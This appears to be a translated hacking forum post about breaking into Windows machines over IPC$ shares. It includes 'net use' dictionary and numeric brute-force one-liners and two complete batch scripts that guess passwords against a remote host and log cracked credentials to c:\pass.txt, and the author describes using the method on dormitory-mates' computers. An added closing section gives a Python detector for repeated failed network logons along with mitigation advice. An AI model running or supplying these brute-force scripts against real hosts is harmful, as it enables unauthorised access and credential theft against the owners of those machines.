Comments: If you know an NT account and password, you can use net use \\host\ipc$ "password" /user:"user" to establish a connection with the remote host. This is a method that everyone who wants to become a hacker, or is trying to become one, knows. Even I know it, and I am not even a newbie; I can use it only if I know an NT account and password.
net use \\host\ipc$ "password" /user:"user"
This establishes a connection with a remote host. It is a method that every hacker, or friend who wants to become or is trying to become a hacker, knows. Even I know it, and I am not even a newbie. It is the only one I know, and I used it to access other people's computers on the dormitory network, because their computer passwords were empty. After they discovered this, I had a chat with them, and then passwords were added. Now I'm done. I want to have a peek at their passwords. They have to work out other methods to prevent them. Maybe you would use other methods, such as searching for a system, to get management permissions, but I cannot because, as I said before, I only know that one. Some people may say that software can be used to brute-force passwords. That may be good, but first, I don't have any advanced software, and I don't have the talent to study complicated usage. However, I found some commands when I accidentally looked at the DOS help. It was really impossible:
1. Dictionary: for /f %i in (dictionary file) do net use \\host\ipc$ "%i" /user:"user"
2. Number: for /l %i in (start,step,end) do net use \\host\ipc$ "%i" /user:"user"
For more information, see the help for "for" in DOS. This let me connect to several machines, but a problem also arose: I still did not know the password after connecting, so everything had to be tried again the next time. I was disappointed. Then I accidentally discovered another good method. Maybe I am too stupid. Maybe you are smarter. Maybe you have already discovered it, so I will not talk nonsense. The whole method is provided below. Please correct me.
Save the following file as pass.bat:
@echo off
echo --------------------------------------------------------------------- >>c:\pass.txt
echo --------------------------------------------------------------------- >>c:\pass.txt
date /t >>c:\pass.txt
time /t >>c:\pass.txt
echo Cracking result: >>c:\pass.txt
if "%6"=="1" goto sh*t2
:sh*t1
start "cracking" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3
goto quit
:sh*t2
start "cracking" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5
:quit
Save the following file as test.bat:
net use \\%1\ipc$ %2 /user:"%3"
goto answer%ERRORLEVEL%
rem %ERRORLEVEL% indicates the result returned by the previous command execution. If the net use operation succeeds, 0 is returned, and if the operation fails, 2 is returned.
:answer0
echo Remote host: "%1" >>c:\pass.txt
echo User: "%3" >>c:\pass.txt
echo Password: %2 >>c:\pass.txt
net use \\%1\ipc$ /delete
exit
:answer2
Store pass.bat and test.bat in system32. The usage is as follows:
1. If you use dictionary cracking: pass.bat <dictionary file path and name> <host> <user name>
2. If a number is used for cracking: pass.bat <start count> <step> <end count> <host> <username> 1
After the password is cracked, it is stored in the c:\pass.txt file.
In addition, I have only tested this on the LAN. Remote testing is restricted by the network speed, so that can only be explored by oneself.
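From the defender's side, the loops above leave a run of failed network logons from one source against one account, possibly ending in a success. The following is an added example, not part of the original article, that flags this pattern in an exported Security log. The CSV layout, threshold, window and sample rows are assumptions constructed here; the event IDs are the Windows ones for failed logon (4625) and successful logon (4624), with logon type 3 (network).

```python
import csv
import io
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample export: time, event id, logon type, account, source address.
SAMPLE = """\
2024-01-10T02:00:01,4625,3,Administrator,192.0.2.15
2024-01-10T02:00:02,4625,3,Administrator,192.0.2.15
2024-01-10T02:00:03,4625,3,Administrator,192.0.2.15
2024-01-10T02:00:04,4625,3,Administrator,192.0.2.15
2024-01-10T02:00:05,4625,3,Administrator,192.0.2.15
2024-01-10T02:00:06,4625,3,Administrator,192.0.2.15
2024-01-10T02:00:07,4624,3,Administrator,192.0.2.15
2024-01-10T08:30:00,4625,3,alice,192.0.2.20
2024-01-10T08:30:20,4624,3,alice,192.0.2.20
"""
FAILED, SUCCESS, NETWORK = "4625", "4624", "3"

def load(text):
    """Parse the assumed CSV export into rows of five strings."""
    return list(csv.reader(io.StringIO(text)))

def detect_guessing(rows, threshold=5, window=timedelta(seconds=60)):
    """Alert on >= threshold failed network logons by one source against one
    account inside `window`; mark the alert if a success follows.
    Rows must be in chronological order."""
    recent = defaultdict(deque)  # (source, account) -> failure times in window
    alerts = {}
    for ts, event_id, logon_type, account, source in rows:
        if logon_type != NETWORK:
            continue
        when = datetime.fromisoformat(ts)
        key = (source, account.lower())
        if event_id == FAILED:
            q = recent[key]
            q.append(when)
            while when - q[0] > window:  # drop failures older than the window
                q.popleft()
            if key in alerts:
                alerts[key]["failures"] += 1
            elif len(q) >= threshold:
                alerts[key] = {"source": source, "account": account,
                               "first_seen": q[0], "failures": len(q),
                               "success_after": False}
        elif event_id == SUCCESS and key in alerts:
            alerts[key]["success_after"] = True  # a guess may have worked
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_guessing(load(SAMPLE)):
        print(alert)
```

An account lockout threshold and non-empty passwords remove the two conditions the loops above depend on; an alert with success_after set should be treated as a likely compromised account.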